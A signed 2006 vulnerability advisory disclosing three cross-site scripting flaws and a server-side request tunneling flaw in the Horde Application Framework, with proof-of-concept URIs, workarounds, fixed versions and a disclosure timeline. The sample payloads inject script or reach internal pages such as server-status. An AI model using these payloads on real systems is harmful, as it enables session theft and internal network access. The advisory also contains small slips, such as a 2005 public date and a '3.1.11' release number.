horde3113010.txt

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
  
SA0011  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
+++++ Horde 3.1.1, 3.0.10 Multiple Security Issues +++++  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
PUBLISHED ON  
July 05, 2006  
  
  
PUBLISHED AT  
http://moritz-naumann.com/adv/0011/hordemulti/0011.txt  
http://moritz-naumann.com/adv/0011/hordemulti/0011.txt.gpg  
  
  
PUBLISHED BY  
Moritz Naumann IT Consulting & Services  
Hamburg, Germany  
http://moritz-naumann.com/  
  
SECURITY at MORITZ hyphon NAUMANN d0t COM  
GPG key: http://moritz-naumann.com/keys/0x277F060C.asc  
  
  
AFFECTED APPLICATION OR SERVICE  
Horde Application Framework  
http://www.horde.org  
  
The Horde Framework is a common code-base used by Horde  
applications, including libraries and a common user interface.  
The best known Horde application to date is probably IMP, a webbased  
IMAP/SMTP client.  
  
  
AFFECTED VERSIONS  
Version 3.0.0 up to and including 3.0.10  
Version 3.1.0 up to and including 3.1.1  
Versions below 3.0.0 have not been examined.  
  
  
ISSUES  
Horde is subject to multiple security vulnerabilities, ranging from  
information disclosure to client side script injection (cross site  
scripting) issues.  
  
+++++ 1. Cross Site Scripting #1  
Horde is subject to a client side script injection vulnerability in  
the URL redirection (dereferrer) function.  
  
By accessing the following (partial) URI on a web site running an  
affected version with a web browser which is prone to this issue,  
client side script code will be injected into the output generated  
by the application:  
  
[Base_URI]/services/go.php?url=http://./;URL=javascript:alert(0);  
  
This problem is caused by insufficient validation of user supplied  
input. It is only known to be exploitable on Internet Explorer 6  
(tested on v6.2900.2180 including all patches on Windows XP SP2).  
Internet Explorer 7 beta 3 is not affected.  
  
+++++ 2. Cross Site Scripting #2  
Horde is subject to a client side script injection vulnerability in  
the help function.  
  
By accessing the following (partial) URI on a web site running a  
vulnerable version with a web browser which is prone to this issue,  
client side script code will be injected into the output generated  
by the application:  
  
  
[Base_URI]/services/help/?show=about&module=%3Cmeta%20http-equiv=%22refresh%22%20content=%220;URL=javascript:alert(0)%3B%22%3E  
  
This problem is caused by insufficient validation of user supplied  
input. All common modern browsers providing Javascript support are  
assumed to be prone to this issue.  
  
+++++ 3. Cross Site Scripting #3  
Horde is subject to a client side script injection  
vulnerability in the problem reporting function.  
  
By accessing the following (partial) URI on a web site running a  
vulnerable version with a web browser which is prone to this issue,  
client side script code will be injected into the output generated  
by the application:  
  
  
[Base_URI]/services/problem.php?name=%22%3E%3Cscript%3Ealert(0)%3B%3C/script%20x=%22  
  
This problem is caused by insufficient validation of user supplied  
input. All common modern browsers providing Javascript support are  
assumed to be prone to this issue.  
  
+++++ 4. Cross Site Scripting #4, Web tunneling behaviour  
Horde is subject to a server side issue which allows to tunnel HTTP  
GET requests through the application and to inject remotely hosted  
web script into the output generated by the application.  
  
This behaviour allows for accessing arbitrary locations which are  
addressable using URIs starting with 'http://','https://' or  
'ftp://' protocol handlers. These locations will be accessible from  
within the security context of the web server running an affected  
version of the application. As a result, an attacker may be able to  
access remote locations s/he would not have otherwise access to,  
without disclosing the real source of the request [1]. Additionally,  
insufficiently access restricted local (server-side) or remote (3rd  
party) locations may become available [2].  
  
By tricking a victim into starting a tunnelling call to a previously  
prepared malicious HTML file, stored in a remote location, which  
contains web script which may be executed on the client side, it is  
possible to extend this into a script injection issue. The injected  
script would be executed by the client within the context of the  
domain the vulnerable web application is hosted in. [3] All common  
modern browsers providing Javascript support are assumed to be prone  
to this issue.  
  
By accessing the following (partial) URIs on a web site running a  
vulnerable version with a web browser, the behaviours described  
above may be triggered:  
  
[1]  
[Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/  
[2]  
[Base_URI]/horde/services/go.php?untrusted=1&url=http://localhost/server-status  
[3]  
[Base_URI]/horde/services/go.php?untrusted=1&url=http://moritz-naumann.com/logger/xss.html  
  
  
BACKGROUND  
Cross Site Scripting (XSS):  
Cross Site Scripting, also known as XSS or CSS, describes  
the injection of malicious content into output produced  
by a web application. A common attack vector is the  
inclusion of arbitrary client side script code into the  
applications' output. Failure to completely sanitize user  
input from malicious content can cause a web application  
to be vulnerable to Cross Site Scripting.  
  
http://www.owasp.org/index.php/Cross_Site_Scripting  
http://en.wikipedia.org/wiki/XSS  
http://www.cgisecurity.net/articles/xss-faq.shtml  
  
  
WORKAROUNDS  
Issues 1-3:  
Client: Disable Javascript.  
Server: Prevent access to vulnerable file(s).  
Issues 1-3:  
Client: Use application as intended only.  
Server: Prevent access to vulnerable file(s).  
  
  
SOLUTIONS  
The Horde project has released versions 3.1.2 and 3.1.11 today.  
These are supposed to fix all of the above issues. The updated  
packages are available at http://horde.org/  
  
  
TIMELINE  
Jun 06, 2006 Issues 1-4: Discovery, code maintainer notification  
Jun 06, 2006 Issues 1-4: Code maintainer acknowledgement  
Jul 05, 2006 Issues 1-4: Code maintainer provides fix publicly  
Jul 05, 2005 Issues 1-4: Public advisory  
  
  
NOTES  
This is not related to CVE-2006-2195.  
  
  
REFERENCES  
Developers' release announcements  
v3.1.2: http://lists.horde.org/archives/announce/2006/000288.html  
v3.0.11: http://lists.horde.org/archives/announce/2006/000287.html  
  
  
ADDITIONAL CREDIT  
N/A  
  
  
LICENSE  
Creative Commons Attribution-ShareAlike License Germany  
http://creativecommons.org/licenses/by-sa/2.0/de/  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.3 (GNU/Linux)  
  
iD8DBQFErDF5n6GkvSd/BgwRAlIlAJ9xrsIW0RfsRyGD0POmQuiamKE0QwCeNHbU  
VYOhRZ7bDiPo6TZfHYl93mE=  
=Avtu  
-----END PGP SIGNATURE-----  
`